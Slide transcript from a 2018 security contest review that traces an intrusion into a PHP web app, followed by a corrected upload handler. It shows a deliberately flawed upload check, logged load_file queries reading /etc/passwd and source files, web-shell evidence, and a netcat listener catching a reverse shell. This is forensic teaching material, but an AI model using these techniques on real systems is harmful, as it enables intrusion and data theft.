
MBSD Cybersecurity Challenges 2018 Final Review Session: Presentation Slides

8ayac
December 12, 2018

Presented as team IPFactory.

Transcript

  1. MBSD Cybersecurity Challenges 2018


  6. sendmessage.php



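    // Slide excerpt; the body of the if block is not shown.
    $prefix = md5(time() . $user->id);
    $tname = $prefix . basename($_FILES["file"]["name"]);
    // move_uploaded_file() is evaluated first, so the file is already in ./tmp/ when the extension check runs.
    if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+\.jpg$/",$tname)) {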


  7. sendmessage.php (2018/9/21 14:46:48)
    180921 14:39:24 26247 Connect [email protected] on mysql
    180921 14:41:06 26247 Query select load_file('/etc/hosts')
    180921 14:41:12 26247 Query select load_file('/etc/passwd')
    180921 14:42:30 26247 Query select load_file('/etc/issue')
    180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
    180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')
    180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')
    180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')
    180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')
    180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')
    180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')


  8. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >


  9. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php


  10. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in
    /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a
    blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1


  11. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"


  12. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783
    "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
    Firefox/52.0"


  13. (2018/9/21 15:29:02)
    $ nc -lvp 4444
    192.168.11.2
    >


  14. (2018/9/21 15:29:02)
    192.168.11.2
    >
    Listening on 4444/TCP…


  15. (2018/9/21 15:29:02)
    192.168.11.2
    >
    Listening on 4444/TCP…


  16. (2018/9/21 15:29:02)
    192.168.11.2
    >
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$


  17. (2018/9/21 15:29:02)
    192.168.11.2
    >
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$
    192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"





  18. POST





  19. POST
    POST



  21. POST



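
The check on slide 6 calls move_uploaded_file() before preg_match(), so a file that fails the extension test has still been written to ./tmp/ under the web root. The following is an added example, not code from the slides or from the examined application: a handler that validates first and moves last. The function name, upload directory and size limit are assumptions, and random_bytes() requires PHP 7 or later.

```php
<?php
// Added example (not from the slides): validate the upload, then move it.
// Hypothetical names: store_uploaded_jpeg(), $uploadDir, $maxBytes.
function store_uploaded_jpeg(array $file, string $uploadDir, int $maxBytes = 2097152): ?string
{
    // 1. Reject failed transfers and anything that is not a genuine HTTP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // 2. Enforce a size limit on the temporary file itself.
    if (filesize($file['tmp_name']) > $maxBytes) {
        return null;
    }

    // 3. Decide the type from the file's bytes, not from the client-supplied name.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== 'image/jpeg') {
        return null;
    }

    // 4. Build the stored name server-side; no part of the client name is reused,
    //    so the extension on disk is always ".jpg".
    $name = bin2hex(random_bytes(16)) . '.jpg';
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    // 5. Only after every check has passed is the file moved into place.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);
    return $name;
}

// Usage: the target directory here is an assumed location outside the document root.
$stored = isset($_FILES['file'])
    ? store_uploaded_jpeg($_FILES['file'], __DIR__ . '/../uploads')
    : null;
```

Keeping the upload directory outside the document root, or disabling script execution in it, means a file that slips past validation is still not served as PHP.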